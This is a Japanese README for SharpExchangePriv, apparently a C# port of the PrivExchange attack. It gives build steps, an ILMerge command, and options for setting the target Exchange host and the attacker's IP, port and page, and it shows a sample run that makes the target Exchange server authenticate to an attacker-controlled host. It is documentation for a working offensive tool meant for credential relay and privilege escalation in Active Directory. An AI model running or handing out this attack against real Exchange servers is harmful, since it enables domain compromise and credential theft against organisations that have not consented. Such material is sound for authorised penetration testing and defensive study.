
@_dirkjan による PrivExchange の C# 実装
@_dirkjan による PrivExchange の C# 実装です。@g0ldenGunSec に感謝します。彼のコードを参考にしました。
Exchange 2016 でテストされています。
SharpExchangePriv は .NET 3.5 向けにビルドされており、Visual Studio 2017 と互換性があります。ソリューションファイルを開き、プロジェクトをビルドするだけです。
引数の解析に CommandLineParser を使用しました。これにより、実行可能ファイルとともに CommandLine.dll ファイルが作成されます。以下のように .exe と .dll を 1 つの実行可能ファイルにマージできます。
ILMerge.exe /out:C:\SharpExchangePriv.exe C:\Release\SharpExchangePriv.exe C:\Release\CommandLine.dll
--targetHostターゲットホストの IP を設定します。
--attackerHost攻撃者の IP を設定します。
--attackerPort攻撃者のポートを設定します。
--attackerPage攻撃者のページを設定します。
--sslSSL を有効にします。
--exchangeVersionExchange のバージョンを設定します。デフォルトは 2016 です。
--exchangePortExchange のターゲットポートを設定します。
C:\Users\george.brown\Desktop>SharpExchangePriv.exe --attackerHost 192.168.11.132 --targetHost 192.168.11.10
/$$$$$$$ /$$ /$$$$$$$$ /$$
| $$__ $$ |__/ | $$_____/ | $$
| $$ \ $$ /$$$$$$ /$$ /$$ /$$| $$ /$$ /$$ /$$$$$$$| $$$$$$$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$
| $$$$$$$//$$__ $$| $$| $$ /$$/| $$$$$ | $$ /$$/ /$$_____/| $$__ $$ |____ $$| $$__ $$ /$$__ $$ /$$__ $$
| $$____ /| $$ \__ /| $$ \ $$/$$/ | $$__ / \ $$$$/ | $$ | $$ \ $$ /$$$$$$$| $$ \ $$| $$ \ $$| $$$$$$$$
| $$ | $$ | $$ \ $$$/ | $$ >$$ $$ | $$ | $$ | $$ /$$__ $$| $$ | $$| $$ | $$| $$_____ /
| $$ | $$ | $$ \ $/ | $$$$$$$$ /$$/\ $$| $$$$$$$| $$ | $$| $$$$$$$| $$ | $$| $$$$$$$| $$$$$$$
|__/ |__/ |__/ \_/ |________/|__/ \__/ \_______/|__/ |__/ \_______/|__/ |__/ \____ $$ \_______/
/$$ \ $$
| $$$$$$/
\______ /
@den_n1s
The target URL is https://192.168.11.10:443/EWS/Exchange.asmx
Sent request to exchange server: https://192.168.11.10:443/EWS/Exchange.asmx
HTTP 200 response received, the target Exchange server should be authenticating shortly.
バグは Github プロジェクトページに報告するか、Twitter @den_n1s でご連絡ください。